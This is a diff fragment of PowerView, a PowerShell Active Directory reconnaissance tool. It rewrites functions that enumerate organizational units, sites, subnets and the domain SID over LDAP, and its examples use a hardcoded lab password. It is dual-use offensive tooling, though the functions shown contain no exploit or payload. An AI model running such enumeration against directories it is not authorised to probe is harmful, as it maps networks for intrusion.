+Specifies the properties of the output object to retrieve from the server.
- Only return OUs with the specified GUID in their gplink property.
+.PARAMETER SearchBase
- .PARAMETER Domain
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- The domain to query for OUs, defaults to the current domain.
+.PARAMETER Server
- .PARAMETER DomainController
+Specifies an Active Directory server (domain controller) to bind to.
- Domain controller to reflect LDAP queries through.
+.PARAMETER SearchScope
- .PARAMETER ADSpath
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- The LDAP source to search through.
+.PARAMETER ResultPageSize
- .PARAMETER FullData
+Specifies the PageSize to set for the LDAP searcher object.
- Switch. Return full OU objects instead of just object names (the default).
+.PARAMETER ServerTimeLimit
- .PARAMETER PageSize
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- The PageSize to set for the LDAP searcher object.
+.PARAMETER SecurityMasks
- .PARAMETER Credential
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.PARAMETER FindOne
- .EXAMPLE
+Only return one result object.
- PS C:\> Get-NetOU
-
- Returns the current OUs in the domain.
+.PARAMETER Tombstone
- .EXAMPLE
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- PS C:\> Get-NetOU -OUName *admin* -Domain testlab.local
-
- Returns all OUs with "admin" in their name in the testlab.local domain.
+.PARAMETER Credential
- .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- PS C:\> Get-NetOU -GUID 123-...
-
- Returns all OUs with linked to the specified group policy object.
+.PARAMETER Raw
- .EXAMPLE
+Switch. Return raw results instead of translating the fields into a custom PSObject.
- PS C:\> "*admin*","*server*" | Get-NetOU
+.EXAMPLE
- Get the full OU names for the given search terms piped on the pipeline.
+Get-DomainOU
+
+Returns the current OUs in the domain.
+
+.EXAMPLE
+
+Get-DomainOU *admin* -Domain testlab.local
+
+Returns all OUs with "admin" in their name in the testlab.local domain.
+
+.EXAMPLE
+
+Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
+
+Returns all OUs with linked to the specified group policy object.
+
+.EXAMPLE
+
+"*admin*","*server*" | Get-DomainOU
+
+Search for OUs with the specific names.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainOU -Credential $Cred
+
+.OUTPUTS
+
+PowerView.OU
+
+Custom PSObject with translated OU property fields.
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.OU')]
[CmdletBinding()]
Param (
- [Parameter(ValueFromPipeline=$True)]
- [String]
- $OUName = '*',
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('Name')]
+ [String[]]
+ $Identity,
+ [ValidateNotNullOrEmpty()]
[String]
- $GUID,
+ [Alias('GUID')]
+ $GPLink,
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- $DomainController,
+ $LDAPFilter,
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $ADSpath,
+ $SearchBase,
- [Switch]
- $FullData,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
- [ValidateRange(1,10000)]
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ServerTimeLimit,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
+
+ [Switch]
+ $Tombstone,
+
+ [Alias('ReturnOne')]
+ [Switch]
+ $FindOne,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $Raw
)
- begin {
- $OUSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize
+ BEGIN {
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $OUSearcher = Get-DomainSearcher @SearcherArguments
}
- process {
+
+ PROCESS {
if ($OUSearcher) {
- if ($GUID) {
- # if we're filtering for a GUID in .gplink
- $OUSearcher.filter="(&(objectCategory=organizationalUnit)(name=$OUName)(gplink=*$GUID*))"
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} | ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match '^OU=.*') {
+ $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ Write-Verbose "[Get-DomainOU] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
+ $SearcherArguments['Domain'] = $IdentityDomain
+ $OUSearcher = Get-DomainSearcher @SearcherArguments
+ if (-not $OUSearcher) {
+ Write-Warning "[Get-DomainOU] Unable to retrieve domain searcher for '$IdentityDomain'"
+ }
+ }
+ }
+ else {
+ try {
+ $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1'
+ $IdentityFilter += "(objectguid=$GuidByteString)"
+ }
+ catch {
+ $IdentityFilter += "(name=$IdentityInstance)"
+ }
+ }
}
- else {
- $OUSearcher.filter="(&(objectCategory=organizationalUnit)(name=$OUName))"
+ if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+ $Filter += "(|$IdentityFilter)"
}
- try {
- $Results = $OUSearcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- if ($FullData) {
- # convert/process the LDAP fields for each result
- $OU = Convert-LDAPProperty -Properties $_.Properties
- $OU.PSObject.TypeNames.Add('PowerView.OU')
- $OU
- }
- else {
- # otherwise just returning the ADS paths of the OUs
- $_.properties.adspath
- }
+ if ($PSBoundParameters['GPLink']) {
+ Write-Verbose "[Get-DomainOU] Searching for OUs with $GPLink set in the gpLink property"
+ $Filter += "(gplink=*$GPLink*)"
+ }
+
+ if ($PSBoundParameters['LDAPFilter']) {
+ Write-Verbose "[Get-DomainOU] Using additional LDAP filter: $LDAPFilter"
+ $Filter += "$LDAPFilter"
+ }
+
+ $OUSearcher.filter = "(&(objectCategory=organizationalUnit)$Filter)"
+ Write-Verbose "[Get-DomainOU] Get-DomainOU filter string: $($OUSearcher.filter)"
+
+ if ($PSBoundParameters['FindOne']) { $Results = $OUSearcher.FindOne() }
+ else { $Results = $OUSearcher.FindAll() }
+ $Results | Where-Object {$_} | ForEach-Object {
+ if ($PSBoundParameters['Raw']) {
+ # return raw result objects
+ $OU = $_
+ }
+ else {
+ $OU = Convert-LDAPProperty -Properties $_.Properties
}
- $Results.dispose()
- $OUSearcher.dispose()
+ $OU.PSObject.TypeNames.Insert(0, 'PowerView.OU')
+ $OU
}
- catch {
- Write-Warning $_
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainOU] Error disposing of the Results object: $_"
+ }
}
+ $OUSearcher.dispose()
}
}
}
-function Get-NetSite {
+function Get-DomainSite {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Search for all sites or specific site objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+.DESCRIPTION
+
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties whencreated,usnchanged,...". By default, all site objects for
+the current domain are returned.
+
+.PARAMETER Identity
+
+An site name (e.g. Test-Site), DistinguishedName (e.g. CN=Test-Site,CN=Sites,CN=Configuration,DC=testlab,DC=local), or
+GUID (e.g. c37726ef-2b64-4524-b85b-6a9700c234dd). Wildcards accepted.
+
+.PARAMETER GPLink
+
+Only return sites with the specified GUID in their gplink property.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER Properties
+
+Specifies the properties of the output object to retrieve from the server.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER SecurityMasks
- Gets a list of all current sites in a domain.
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
- .PARAMETER SiteName
+.PARAMETER Tombstone
- Site filter string, wildcards accepted.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- .PARAMETER Domain
+.PARAMETER FindOne
- The domain to query for sites, defaults to the current domain.
+Only return one result object.
- .PARAMETER DomainController
+.PARAMETER Credential
- Domain controller to reflect LDAP queries through.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- .PARAMETER ADSpath
+.PARAMETER Raw
- The LDAP source to search through.
+Switch. Return raw results instead of translating the fields into a custom PSObject.
- .PARAMETER GUID
+.EXAMPLE
- Only return site with the specified GUID in their gplink property.
+Get-DomainSite
- .PARAMETER FullData
+Returns the current sites in the domain.
- Switch. Return full site objects instead of just object names (the default).
+.EXAMPLE
- .PARAMETER PageSize
+Get-DomainSite *admin* -Domain testlab.local
- The PageSize to set for the LDAP searcher object.
+Returns all sites with "admin" in their name in the testlab.local domain.
- .PARAMETER Credential
+.EXAMPLE
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+Get-DomainSite -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
- .EXAMPLE
+Returns all sites with linked to the specified group policy object.
- PS C:\> Get-NetSite -Domain testlab.local -FullData
-
- Returns the full data objects for all sites in testlab.local
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSite -Credential $Cred
+
+.OUTPUTS
+
+PowerView.Site
+
+Custom PSObject with translated site property fields.
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.Site')]
[CmdletBinding()]
Param (
- [Parameter(ValueFromPipeline=$True)]
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('Name')]
+ [String[]]
+ $Identity,
+
+ [ValidateNotNullOrEmpty()]
[String]
- $SiteName = "*",
+ [Alias('GUID')]
+ $GPLink,
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $DomainController,
+ $SearchBase,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $ADSpath,
+ $Server,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
- $GUID,
+ $SearchScope = 'Subtree',
- [Switch]
- $FullData,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
- [ValidateRange(1,10000)]
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ServerTimeLimit,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
+
+ [Switch]
+ $Tombstone,
+
+ [Alias('ReturnOne')]
+ [Switch]
+ $FindOne,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $Raw
)
- begin {
- $SiteSearcher = Get-DomainSearcher -ADSpath $ADSpath -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSprefix "CN=Sites,CN=Configuration" -PageSize $PageSize
+ BEGIN {
+ $SearcherArguments = @{
+ 'SearchBasePrefix' = 'CN=Sites,CN=Configuration'
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $SiteSearcher = Get-DomainSearcher @SearcherArguments
}
- process {
- if($SiteSearcher) {
- if ($GUID) {
- # if we're filtering for a GUID in .gplink
- $SiteSearcher.filter="(&(objectCategory=site)(name=$SiteName)(gplink=*$GUID*))"
- }
- else {
- $SiteSearcher.filter="(&(objectCategory=site)(name=$SiteName))"
- }
-
- try {
- $Results = $SiteSearcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- if ($FullData) {
- # convert/process the LDAP fields for each result
- $Site = Convert-LDAPProperty -Properties $_.Properties
- $Site.PSObject.TypeNames.Add('PowerView.Site')
- $Site
+ PROCESS {
+ if ($SiteSearcher) {
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} | ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match '^CN=.*') {
+ $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ Write-Verbose "[Get-DomainSite] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
+ $SearcherArguments['Domain'] = $IdentityDomain
+ $SiteSearcher = Get-DomainSearcher @SearcherArguments
+ if (-not $SiteSearcher) {
+ Write-Warning "[Get-DomainSite] Unable to retrieve domain searcher for '$IdentityDomain'"
+ }
}
- else {
- # otherwise just return the site name
- $_.properties.name
+ }
+ else {
+ try {
+ $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1'
+ $IdentityFilter += "(objectguid=$GuidByteString)"
+ }
+ catch {
+ $IdentityFilter += "(name=$IdentityInstance)"
}
}
- $Results.dispose()
- $SiteSearcher.dispose()
}
- catch {
- Write-Verbose $_
+ if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+ $Filter += "(|$IdentityFilter)"
+ }
+
+ if ($PSBoundParameters['GPLink']) {
+ Write-Verbose "[Get-DomainSite] Searching for sites with $GPLink set in the gpLink property"
+ $Filter += "(gplink=*$GPLink*)"
+ }
+
+ if ($PSBoundParameters['LDAPFilter']) {
+ Write-Verbose "[Get-DomainSite] Using additional LDAP filter: $LDAPFilter"
+ $Filter += "$LDAPFilter"
}
+
+ $SiteSearcher.filter = "(&(objectCategory=site)$Filter)"
+ Write-Verbose "[Get-DomainSite] Get-DomainSite filter string: $($SiteSearcher.filter)"
+
+ if ($PSBoundParameters['FindOne']) { $Results = $SiteSearcher.FindAll() }
+ else { $Results = $SiteSearcher.FindAll() }
+ $Results | Where-Object {$_} | ForEach-Object {
+ if ($PSBoundParameters['Raw']) {
+ # return raw result objects
+ $Site = $_
+ }
+ else {
+ $Site = Convert-LDAPProperty -Properties $_.Properties
+ }
+ $Site.PSObject.TypeNames.Insert(0, 'PowerView.Site')
+ $Site
+ }
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainSite] Error disposing of the Results object"
+ }
+ }
+ $SiteSearcher.dispose()
}
}
}
-function Get-NetSubnet {
+function Get-DomainSubnet {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Search for all subnets or specific subnets objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+.DESCRIPTION
+
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties whencreated,usnchanged,...". By default, all subnet objects for
+the current domain are returned.
+
+.PARAMETER Identity
+
+An subnet name (e.g. '192.168.50.0/24'), DistinguishedName (e.g. 'CN=192.168.50.0/24,CN=Subnets,CN=Sites,CN=Configuratioiguration,DC=testlab,DC=local'),
+or GUID (e.g. c37726ef-2b64-4524-b85b-6a9700c234dd). Wildcards accepted.
+
+.PARAMETER SiteName
+
+Only return subnets from the specified SiteName.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER Properties
+
+Specifies the properties of the output object to retrieve from the server.
- Gets a list of all current subnets in a domain.
+.PARAMETER SearchBase
- .PARAMETER SiteName
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- Only return subnets from the specified SiteName.
+.PARAMETER Server
- .PARAMETER Domain
+Specifies an Active Directory server (domain controller) to bind to.
- The domain to query for subnets, defaults to the current domain.
+.PARAMETER SearchScope
- .PARAMETER DomainController
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- Domain controller to reflect LDAP queries through.
+.PARAMETER ResultPageSize
- .PARAMETER ADSpath
+Specifies the PageSize to set for the LDAP searcher object.
- The LDAP source to search through.
+.PARAMETER ServerTimeLimit
- .PARAMETER FullData
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- Switch. Return full subnet objects instead of just object names (the default).
+.PARAMETER SecurityMasks
- .PARAMETER PageSize
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
- The PageSize to set for the LDAP searcher object.
+.PARAMETER Tombstone
- .PARAMETER Credential
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+.PARAMETER FindOne
- .EXAMPLE
+Only return one result object.
- PS C:\> Get-NetSubnet
-
- Returns all subnet names in the current domain.
+.PARAMETER Credential
- .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- PS C:\> Get-NetSubnet -Domain testlab.local -FullData
-
- Returns the full data objects for all subnets in testlab.local
+.PARAMETER Raw
+
+Switch. Return raw results instead of translating the fields into a custom PSObject.
+
+.EXAMPLE
+
+Get-DomainSubnet
+
+Returns the current subnets in the domain.
+
+.EXAMPLE
+
+Get-DomainSubnet *admin* -Domain testlab.local
+
+Returns all subnets with "admin" in their name in the testlab.local domain.
+
+.EXAMPLE
+
+Get-DomainSubnet -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272"
+
+Returns all subnets with linked to the specified group policy object.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainSubnet -Credential $Cred
+
+.OUTPUTS
+
+PowerView.Subnet
+
+Custom PSObject with translated subnet property fields.
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.Subnet')]
[CmdletBinding()]
Param (
- [Parameter(ValueFromPipeline=$True)]
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('Name')]
+ [String[]]
+ $Identity,
+
+ [ValidateNotNullOrEmpty()]
[String]
- $SiteName = "*",
+ $SiteName,
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $ADSpath,
+ $Server,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
- $DomainController,
+ $SearchScope = 'Subtree',
- [Switch]
- $FullData,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
- [ValidateRange(1,10000)]
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ServerTimeLimit,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
+
+ [Switch]
+ $Tombstone,
+
+ [Alias('ReturnOne')]
+ [Switch]
+ $FindOne,
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $Raw
)
- begin {
- $SubnetSearcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $ADSpath -ADSprefix "CN=Subnets,CN=Sites,CN=Configuration" -PageSize $PageSize
+ BEGIN {
+ $SearcherArguments = @{
+ 'SearchBasePrefix' = 'CN=Subnets,CN=Sites,CN=Configuration'
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $SubnetSearcher = Get-DomainSearcher @SearcherArguments
}
- process {
- if($SubnetSearcher) {
+ PROCESS {
+ if ($SubnetSearcher) {
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} | ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match '^CN=.*') {
+ $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ Write-Verbose "[Get-DomainSubnet] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
+ $SearcherArguments['Domain'] = $IdentityDomain
+ $SubnetSearcher = Get-DomainSearcher @SearcherArguments
+ if (-not $SubnetSearcher) {
+ Write-Warning "[Get-DomainSubnet] Unable to retrieve domain searcher for '$IdentityDomain'"
+ }
+ }
+ }
+ else {
+ try {
+ $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1'
+ $IdentityFilter += "(objectguid=$GuidByteString)"
+ }
+ catch {
+ $IdentityFilter += "(name=$IdentityInstance)"
+ }
+ }
+ }
+ if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+ $Filter += "(|$IdentityFilter)"
+ }
- $SubnetSearcher.filter="(&(objectCategory=subnet))"
+ if ($PSBoundParameters['LDAPFilter']) {
+ Write-Verbose "[Get-DomainSubnet] Using additional LDAP filter: $LDAPFilter"
+ $Filter += "$LDAPFilter"
+ }
- try {
- $Results = $SubnetSearcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- if ($FullData) {
- # convert/process the LDAP fields for each result
- Convert-LDAPProperty -Properties $_.Properties | Where-Object { $_.siteobject -match "CN=$SiteName" }
- }
- else {
- # otherwise just return the subnet name and site name
- if ( ($SiteName -and ($_.properties.siteobject -match "CN=$SiteName,")) -or ($SiteName -eq '*')) {
+ $SubnetSearcher.filter = "(&(objectCategory=subnet)$Filter)"
+ Write-Verbose "[Get-DomainSubnet] Get-DomainSubnet filter string: $($SubnetSearcher.filter)"
- $SubnetProperties = @{
- 'Subnet' = $_.properties.name[0]
- }
- try {
- $SubnetProperties['Site'] = ($_.properties.siteobject[0]).split(",")[0]
- }
- catch {
- $SubnetProperties['Site'] = 'Error'
- }
+ if ($PSBoundParameters['FindOne']) { $Results = $SubnetSearcher.FindOne() }
+ else { $Results = $SubnetSearcher.FindAll() }
+ $Results | Where-Object {$_} | ForEach-Object {
+ if ($PSBoundParameters['Raw']) {
+ # return raw result objects
+ $Subnet = $_
+ }
+ else {
+ $Subnet = Convert-LDAPProperty -Properties $_.Properties
+ }
+ $Subnet.PSObject.TypeNames.Insert(0, 'PowerView.Subnet')
- New-Object -TypeName PSObject -Property $SubnetProperties
- }
+ if ($PSBoundParameters['SiteName']) {
+ # have to do the filtering after the LDAP query as LDAP doesn't let you specify
+ # wildcards for 'siteobject' :(
+ if ($Subnet.properties -and ($Subnet.properties.siteobject -like "*$SiteName*")) {
+ $Subnet
}
+ elseif ($Subnet.siteobject -like "*$SiteName*") {
+ $Subnet
+ }
+ }
+ else {
+ $Subnet
}
- $Results.dispose()
- $SubnetSearcher.dispose()
}
- catch {
- Write-Warning $_
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainSubnet] Error disposing of the Results object: $_"
+ }
}
+ $SubnetSearcher.dispose()
}
}
}
@@ -5010,244 +9654,511 @@ function Get-NetSubnet {
function Get-DomainSID {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Returns the SID for the current domain or the specified domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer
+
+.DESCRIPTION
+
+Returns the SID for the current domain or the specified domain by executing
+Get-DomainComputer with the -LDAPFilter set to (userAccountControl:1.2.840.113556.1.4.803:=8192)
+to search for domain controllers through LDAP. The SID of the returned domain controller
+is then extracted.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
- Gets the SID for the domain.
+.PARAMETER Server
- .PARAMETER Domain
+Specifies an Active Directory server (domain controller) to bind to.
- The domain to query, defaults to the current domain.
+.PARAMETER Credential
- .PARAMETER DomainController
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- Domain controller to reflect LDAP queries through.
+.EXAMPLE
- .EXAMPLE
+Get-DomainSID
- C:\> Get-DomainSID -Domain TEST
-
- Returns SID for the domain 'TEST'
+.EXAMPLE
+
+Get-DomainSID -Domain testlab.local
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
